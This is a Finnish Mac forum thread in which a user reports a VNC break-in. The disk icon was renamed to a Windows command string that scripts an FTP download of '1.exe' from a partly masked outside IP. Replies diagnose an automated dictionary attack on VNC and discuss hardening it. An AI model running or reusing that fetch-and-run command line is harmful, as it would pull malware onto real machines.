Murtautumisyritys?
-
- Viestit: 73
- Liittynyt: 18.3.2004 klo 19.01
Murtautumisyritys?
Viesti Kirjoittaja macurious »
Tuttavan vanhempien Mac on viime aikoina käyttäytynyt kummallisen hitaasti ja tänään ystäväni kirjautuessa koneelle työpöydällä olevan kovalevykuvakkeen teksti muuttui automaattisesti seuraavaksi:
"cmd -c echo open xx.xx.xx.xxx 10170 .. ik 7echo user db database .. ik 7echo get 1.exe .. ik 7echo bye .."
Onko kyseessä joku murtautumisyritys? Koneessa on (tai oli) koneen varsinaisten omistajien avustamiseksi salasanalla suojattu (mutta salaamaton) vnc-palvelu päällä. Muut palvelut on suljettu ja palomuuri on päällä. Virustorjunta ei löytänyt mitään haittaohjelmia.
Koneelle kirjautunut ystäväni käyttää admin-tunnusta, mutta konetta normaalisti käyttävät vanhemmat perustunnusta. Kone ei kysynyt ylläpitäjän salasanaa kovalevykuvakkeen nimen muuttuessa, vaikka se sitä käsittääkseni normaalisti pyytää.
Osaako joku kertoa mistä on kyse?
Edit: typo
-
- Viestit: 357
- Liittynyt: 21.2.2007 klo 22.33
- Paikkakunta: Tampere
-
- Viestit: 73
- Liittynyt: 18.3.2004 klo 19.01
Piilotettu IP
Viesti Kirjoittaja macurious »
Piilotetun ip-osoitteen alku on 89.38....
-
- Viestit: 845
- Liittynyt: 18.4.2006 klo 15.30
- Paikkakunta: Helsinki
Viesti Kirjoittaja Donza »
-
- Viestit: 41
- Liittynyt: 25.4.2007 klo 2.17
Viesti Kirjoittaja ziggysd »
-
- Viestit: 73
- Liittynyt: 18.3.2004 klo 19.01
Kiitos vihjeestä
Viesti Kirjoittaja macurious »
Koska se on täysin automatisoitu, se ei tajua olevansa Macissa vaan yrittää ladata pc:n haittaohjelmia. Tuskin siis tekee tai pääsi tekemään mitään todellista vahinkoa, mutta tuo tarkoittaa kyllä sitä, että vnc:tä ei ilman ssh-tunnelointia uskalla enää pitää päällä? Tuokin kone oli NAT-palomuurin takana OS X:n oman palomuurin lisäksi, ja tosiaan tuo vnc-portti oli ainoa ulospäin mapattu.
-
- Viestit: 9612
- Liittynyt: 10.10.2004 klo 5.05
Re: Kiitos vihjeestä
Viesti Kirjoittaja Mikael K. »
Onko mahdollista suomentaa tämä? En ymmärtänyt mistä viestissä on kysymys. Ilmeisesti jokin olennaisen tärkeä seikka on menossa ymmärtämättömyyden vuoksi sivu suun.macurious kirjoitti:Luin tuon threadin ja näyttää tosiaan selvältä, että samasta asiasta on kyse. Eli automatisoitu porttiskannaus ja vnc-skriptaus on taustalla ja se käyttää sanakirjahyökkäystä vnc:n salasanan murtamiseen.
Koska se on täysin automatisoitu, se ei tajua olevansa Macissa vaan yrittää ladata pc:n haittaohjelmia. Tuskin siis tekee tai pääsi tekemään mitään todellista vahinkoa, mutta tuo tarkoittaa kyllä sitä, että vnc:tä ei ilman ssh-tunnelointia uskalla enää pitää päällä? Tuokin kone oli NAT-palomuurin takana OS X:n oman palomuurin lisäksi, ja tosiaan tuo vnc-portti oli ainoa ulospäin mapattu.
-
- Viestit: 1412
- Liittynyt: 22.2.2004 klo 23.08
- Paikkakunta: Helsinki
Viesti Kirjoittaja Sälli »
-
- Viestit: 4389
- Liittynyt: 3.1.2005 klo 14.37
Re: Kiitos vihjeestä
Viesti Kirjoittaja matteus/2 »
Koneelle on päästy VNC:n kautta arvaamalla VNC:n salasana oikein yrityksen ja erehdyksen kautta sanakirjaa käyttäen (ns. dictionary attack). Ei siis syytä huoleen jos salasanasi on kunnossa, tai et käytä VNC:tä. OS X:n tietoturvaan tämä ei suoranaisesti liity mitenkään.Mikael K. kirjoitti:Onko mahdollista suomentaa tämä? En ymmärtänyt mistä viestissä on kysymys. Ilmeisesti jokin olennaisen tärkeä seikka on menossa ymmärtämättömyyden vuoksi sivu suun.
-
- Viestit: 9612
- Liittynyt: 10.10.2004 klo 5.05
Re: Kiitos vihjeestä
Viesti Kirjoittaja Mikael K. »
Hyvä ja kiitos kumarruksen kera! Asia selvisi linkin kautta kirkkaaksi.matteus/2 kirjoitti:Koneelle on päästy VNC:n kautta arvaamalla VNC:n salasana oikein yrityksen ja erehdyksen kautta sanakirjaa käyttäen (ns. dictionary attack). Ei siis syytä huoleen jos salasanasi on kunnossa, tai et käytä VNC:tä. OS X:n tietoturvaan tämä ei suoranaisesti liity mitenkään.Mikael K. kirjoitti:Onko mahdollista suomentaa tämä? En ymmärtänyt mistä viestissä on kysymys. Ilmeisesti jokin olennaisen tärkeä seikka on menossa ymmärtämättömyyden vuoksi sivu suun.
-
- Viestit: 422
- Liittynyt: 11.1.2005 klo 21.53
Re: Kiitos vihjeestä
Viesti Kirjoittaja Lakki »
Todellisuus on kuitenkin raportin mukaan sitä, että kone ollut "kummallisen hidas"macurious kirjoitti:Tuskin siis tekee tai pääsi tekemään mitään todellista vahinkoa,
ja kovalevykuvakkeen teksti muuttunut tylypahkalaiseksi loitsuksi. Herkempi ja
hermompi hemmo/-tar voisi kimmastua tekemään jotain rumaa ja äkkipikaista,
joten ei tätä nyt kannattaisi kauheasti vähätelläkään. Sangen outoa..?
-
- Viestit: 4725
- Liittynyt: 8.3.2004 klo 17.38
- Paikkakunta: Helsinki
Viesti Kirjoittaja spiidi78 »
-
- Viestit: 73
- Liittynyt: 18.3.2004 klo 19.01
Vnc sulkeminen auttoi
Viesti Kirjoittaja macurious »
Outona minäkin pidän edelleen sitä, että miten Windowsille suunniteltu skripti voi uudelleen nimetä boottilevyn, joka vaatii normaalisti käyttäjältä ylläpitäjän salasanan kirjoittamisen. Tuntuu että tuossa voisi kyllä olla oikeasti jotain tietoturvaongelmaa... Ylläpitäjän salasana oli eri kuin vnc:n, joten se ei hyökkäyksessä samalla paljastunut.
-
- Viestit: 18040
- Liittynyt: 20.2.2004 klo 23.12
- Paikkakunta: Tampere
Viesti Kirjoittaja Jamac »
Tuota itsekin hiukan mietin, ja sen kummemmin kyseistä VNC-tekniikkaa tms. tuntematta, niin jos ajatellaan että sitä kautta tulee merkkijonoa ikään kuin keyboard-inputtina, niin ainakin Finderissa kun painaa Tab:ia ja enteriä niin "pääsee" muuttamaan kovalevyikonin nimeä. Tab:ja tarvitaan n-määrä riippuen siitä kuinka monta muuta tiedostoa/kansiota työpöydälllä on.kovalevykuvakkeen teksti
-
- Viestit: 73
- Liittynyt: 18.3.2004 klo 19.01
kovalevykuvakkeen tekstista
Viesti Kirjoittaja macurious »
-
- Viestit: 17181
- Liittynyt: 15.11.2004 klo 11.07
-
- Viestit: 1275
- Liittynyt: 24.3.2006 klo 19.30
- Paikkakunta: Ulkomailla
Viesti Kirjoittaja Aaaron »
Ei noihin oikein parane luottaa sellaisenaan.
-
- Viestit: 92
- Liittynyt: 6.5.2006 klo 11.31
- Paikkakunta: Helsinki
Re: kovalevykuvakkeen tekstista
Viesti Kirjoittaja samelis »
Miks mulla ei kysy mitään salasanoja? Johtuuko siitä että olen itse admin?macurious kirjoitti:Jatkoa edelleen, joo, muokkaamaan pääsee. Se lienee helppo skriptata, mutta kun painaa enteriä hyväksyäkseen nimen muutoksen, niin ainakin minulla järjestelmä kysyy ylläpitäjän salasanan ennen kuin nimi oikeasti muuttuu. Tässä tilanteessa tuttavani oli katsellut ihmeissään kun nimi oli muuttunut ilman mitään dialogia ja nimen takaisinvaihtamiseen tarvittiin ylläpitäjän salasana...
-
- Viestit: 73
- Liittynyt: 18.3.2004 klo 19.01
Re: kovalevykuvakkeen tekstista
Viesti Kirjoittaja macurious »
Ainakin tässä tapauksessa nimen takaisinmuuttaja oli admin ja silti kysyttiin.samelis kirjoitti:Miks mulla ei kysy mitään salasanoja? Johtuuko siitä että olen itse admin?macurious kirjoitti:Jatkoa edelleen, joo, muokkaamaan pääsee. Se lienee helppo skriptata, mutta kun painaa enteriä hyväksyäkseen nimen muutoksen, niin ainakin minulla järjestelmä kysyy ylläpitäjän salasanan ennen kuin nimi oikeasti muuttuu. Tässä tilanteessa tuttavani oli katsellut ihmeissään kun nimi oli muuttunut ilman mitään dialogia ja nimen takaisinvaihtamiseen tarvittiin ylläpitäjän salasana...
-
- Viestit: 628
- Liittynyt: 28.9.2005 klo 16.20
- Paikkakunta: Tampere
-
- Viestit: 73
- Liittynyt: 18.3.2004 klo 19.01
Palaa sivulle “Tietoturva ja varmuuskopiointi”
- Yleiset aiheet
- ↳ Ajankohtaista Apple-maailmasta
- ↳ Käyttöjärjestelmät
- ↳ Ohjelmat
- ↳ Yleiskeskustelu
- Mac ja oheislaitteet
- ↳ Yleiskeskustelu laitteista
- ↳ MacBook, MacBook Pro ja MacBook Air
- ↳ iMac
- ↳ Mac mini
- ↳ Mac Pro ja Mac Studio
- ↳ Ongelmia Macin kanssa?
- iPhone, iPad ja Apple Watch
- ↳ iPhone-, iPad- ja Apple Watch -laitekeskustelu
- ↳ iPhone-, iPad- ja Apple Watch -ohjelmat sekä iOS
- ↳ Ongelmia iPhonen, iPadin tai Apple Watchin kanssa?
- Huviksi ja hyödyksi
- ↳ Off-topic
- ↳ Kuva ja graafinen suunnittelu
- ↳ Audio ja musiikki
- ↳ Video, televisio ja elokuvat
- ↳ Pelit ja pelaaminen
- ↳ Ohjelmointi, skriptit ja palvelimet
- ↳ Tietoturva ja varmuuskopiointi
- ↳ Verkot, mobiilidata ja muut puhelimet
- ↳ Retronurkka
- ↳ Foorumin ylläpito
- Kauppapaikka
- ↳ Myydään Mac
- ↳ Myydään iPhone, iPad ja iPod
- ↳ Myydään muut Applen tuotteet
- ↳ Myydään muuta tietotekniikkaa
- ↳ Ostetaan Mac
- ↳ Ostetaan iPhone, iPad ja iPod
- ↳ Ostetaan muut Applen tuotteet
- ↳ Ostetaan muuta tietotekniikkaa
- ↳ Vaihdetaan, annetaan, työtä haetaan ja tarjotaan
- ↳ Kauppapaikan keskustelu ja hintavinkit